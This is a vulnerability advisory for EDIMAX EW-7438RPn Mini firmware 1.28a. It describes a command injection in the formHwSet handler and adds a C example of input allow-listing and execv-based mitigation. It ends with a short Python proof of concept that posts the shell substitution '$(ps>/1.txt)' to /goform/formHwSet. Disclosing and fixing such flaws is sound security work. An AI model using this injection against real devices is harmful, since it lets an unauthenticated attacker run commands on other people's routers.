Overview

Affected version

EW-7438RPn Mini Firmware 1.28a (Version : 1.28a)

Vulnerability details

The EDIMAX EW-7438RPn Mini firmware 1.28a (Version : 1.28a) has a command injection vulnerability in the formHwSet function. The function reads the Anntena/Mcs/regDomain/nic0Addr/nic1Addr/wlanAddr/wanAddr/wlanSSID/wlanChan/comd/initgain/txcck/txofdm parameters from a POST request. Because the user controls the values of these parameters and they reach a system() call, a command can be injected.
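One way to close this class of bug, as an added example that is not EDIMAX's code and not part of the original report: check each parameter against a character allow-list and start the helper program with an argument vector instead of system(). The function names, the 64-byte limit and the tool path and option arguments are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define HW_PARAM_MAX 64  /* assumed upper bound, not taken from the firmware */

/* Returns 1 only if value is non-empty, bounded, and made of characters
 * that have no meaning to a shell (alphanumerics plus ':', '.', '-', '_'). */
int hw_param_is_safe(const char *value)
{
    size_t len = value ? strlen(value) : 0;

    if (len == 0 || len > HW_PARAM_MAX)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)value[i];
        if (!isalnum(c) && c != ':' && c != '.' && c != '-' && c != '_')
            return 0;
    }
    return 1;
}

/* Hypothetical replacement for system("<tool> <option> <value>"): the value
 * is passed as one argv element, so no shell ever parses it.
 * Returns the tool's exit status, or -1 if the value is rejected or the
 * process cannot be started or waited for. */
int hw_run_tool(const char *tool_path, const char *option, const char *value)
{
    int status;
    pid_t pid;

    if (!hw_param_is_safe(value))
        return -1;                    /* rejected before any process starts */
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)tool_path, (char *)option, (char *)value, NULL };
        execv(tool_path, argv);
        _exit(127);                   /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Free-form fields such as wlanSSID need a wider character set than this allow-list permits; for those, the argv-based call is what keeps the value away from a shell.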


POC

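import requests

# Address of the device in the author's test setup
ip = "192.168.153.2"

# Shell command substitution placed in the Anntena parameter;
# if it is executed, the output of ps is written to /1.txt on the device
payload = "$(ps>/1.txt)"
data = {"Anntena": payload}

# formHwSet handler
url = f'http://{ip}/goform/formHwSet'

res = requests.post(url=url, data=data, verify=False)
print(res)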
